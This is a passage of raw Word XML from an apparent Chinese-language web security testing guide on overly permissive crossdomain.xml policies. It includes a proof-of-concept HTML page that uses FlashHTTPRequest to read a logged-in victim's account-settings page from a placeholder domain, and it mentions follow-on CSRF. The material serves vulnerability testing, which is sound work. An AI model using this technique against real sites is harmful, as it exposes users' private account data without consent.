        <w:t xml:space="preserve"> crossdomain.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需严格遵守</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语法，有且仅有一个根节点</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cross-domain-policy</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，且不包含任何属性。在此根节点下只能包含如下的子节点：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7404DD54"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site-control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79ABE350"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allow-access-from</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523C6162"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allow-access-from-identity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7170C70A"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allow-http-request-headers-from</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAA6861" w14:textId="78AB564D" w:rsidR="00B00111" w:rsidRPr="00245D4F" w:rsidRDefault="00E8588E" w:rsidP="00245D4F">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>如果</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>crossdomain.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件配置</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>allow-access-from</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，将允许任何域下的</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flash</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行跨域请求。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADF5EB0" w14:textId="6BA93123" w:rsidR="004F4F27" w:rsidRPr="00245D4F" w:rsidRDefault="00B00111" w:rsidP="00245D4F">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>测试方法：</w:t>
      </w:r>
      <w:r w:rsidR="004F4F27" w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00530EF0" w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下面列举一个具体的利用场景：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD87D38" w14:textId="450AAA6B" w:rsidR="00A002EE" w:rsidRPr="00245D4F" w:rsidRDefault="00A002EE" w:rsidP="00245D4F">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>http://www.</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xxx</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>.com/crossdomain.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>文件内容如下图所示</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4896D8" w14:textId="77777777" w:rsidR="00A002EE" w:rsidRPr="00245D4F" w:rsidRDefault="00A002EE" w:rsidP="00245D4F">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E520CE3" wp14:editId="5CC5543A">
            <wp:extent cx="5274310" cy="808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8990"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CFE3F0"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利用开源的</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>FlashHTTPRequest</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>下载地址</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>https://github.com/mandatoryprogrammer/FlashHTTPRequest</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>FlashHTTPRequest</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>使用方法参考</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>README</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F68579C" w14:textId="490221F5" w:rsidR="00A002EE" w:rsidRPr="00245D4F" w:rsidRDefault="00A002EE" w:rsidP="00245D4F">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在本地服务器编写一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面，嵌入</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>FlashHTTPRequest.swf</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，此页面的目的是获取受害者的账号设置页面：</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>http://www.</w:t>
      </w:r>
      <w:r w:rsidR="00EA771A" w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>xx</w:t>
      </w:r>
      <w:r w:rsidR="00EA771A" w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>.com/user-setting</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>源代码如下</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8296"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A002EE" w:rsidRPr="00245D4F" w14:paraId="6C89E094" w14:textId="77777777" w:rsidTr="00D24698">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="82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F5EB51"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DOCTYPE html&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35514EA1"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tml lang="en"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B4245EA"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ead&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0880EA2B"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meta charset="utf-8"/&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54A4240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script src="flashhttprequest.js"&gt;&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3806E10F"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script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AF4BEFB"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hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">        v</w:t>
            </w:r>
            <w:r w:rsidRPr="00245D4F">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
              <w:t>ar res="";</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A4FAEC7"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t>function setres(data){</w:t>
            </w:r>
            <w:r w:rsidRPr="00245D4F">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> //</w:t>
            </w:r>
            <w:r w:rsidRPr="00245D4F">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将返回结果打印至页面中</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DF0CB0D"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r>
            <w:r w:rsidRPr="00245D4F">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
              <w:tab/>
              <w:t>window.res=data;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19AAABDC"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r>
            <w:r w:rsidRPr="00245D4F">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
              <w:tab/>
              <w:t>//console.log(data);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="438FCD65"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r>
            <w:r w:rsidRPr="00245D4F">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
              <w:tab/>
              <w:t>document.write(data);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EC7778D"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t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4542509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 xml:space="preserve">        function onhook() {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C1A67C8" w14:textId="4C713CA7" w:rsidR="00A002EE" w:rsidRPr="00245D4F" w:rsidRDefault="00A002EE" w:rsidP="00245D4F">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00245D4F">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve">                FlashHTTPRequest.open('GET', 'http://www.</w:t>
            </w:r>
            <w:r w:rsidR="00EA771A" w:rsidRPr="00245D4F">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
              <w:t>xx</w:t>
            </w:r>
            <w:r w:rsidR="00EA771A" w:rsidRPr="00245D4F">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>x</w:t>
            </w:r>
            <w:r w:rsidRPr="00245D4F">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
              <w:t>.com/user-setting', '', 'setres' );</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C0C1C9A"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lastRenderedPageBreak/>
              <w:t xml:space="preserve">        }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37B21B95"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script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46D9029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ead&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E451E12"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body&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C9F4965"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div id="flashBridge"&gt;&lt;/div&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55CF6BA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body&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1161B5D8"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tml&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0079880E" w14:textId="1E586B98" w:rsidR="00A002EE" w:rsidRPr="00245D4F" w:rsidRDefault="00A002EE" w:rsidP="00245D4F">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>登录</w:t>
      </w:r>
      <w:r w:rsidR="00EA771A" w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该网站</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>后</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>访问构造好的</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>页面</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>http://127.0.0.1/crossdomain/index.html</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，页面内容是</w:t>
      </w:r>
      <w:r w:rsidR="00EA771A" w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网站的账号设置页面，如下图所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51651EFB" w14:textId="77777777" w:rsidR="00A002EE" w:rsidRPr="00245D4F" w:rsidRDefault="00A002EE" w:rsidP="00245D4F">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="193D2757" wp14:editId="5A1AE828">
            <wp:extent cx="2323809" cy="289523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3809" cy="2895238"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3101C3BE" w14:textId="2F626F3C" w:rsidR="00B00111" w:rsidRPr="00245D4F" w:rsidRDefault="00A002EE" w:rsidP="00245D4F">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>由此</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>可以构造</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>……</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A228972" w14:textId="42C3C22F" w:rsidR="004F4F27" w:rsidRPr="00245D4F" w:rsidRDefault="00C24790" w:rsidP="00245D4F">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="00B00111" w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="004F4F27" w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击</w:t>
      </w:r>
      <w:r w:rsidR="00543604" w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>者通过如下攻击</w:t>
      </w:r>
      <w:r w:rsidR="004F4F27" w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>过程</w:t>
      </w:r>
      <w:r w:rsidR="00543604" w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可获取用户敏感信息</w:t>
      </w:r>
      <w:r w:rsidR="004F4F27" w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FFBD77" w14:textId="77777777" w:rsidR="004F4F27" w:rsidRPr="00245D4F" w:rsidRDefault="004F4F27" w:rsidP="00245D4F">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="112"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者构造一个恶意的</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flash</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
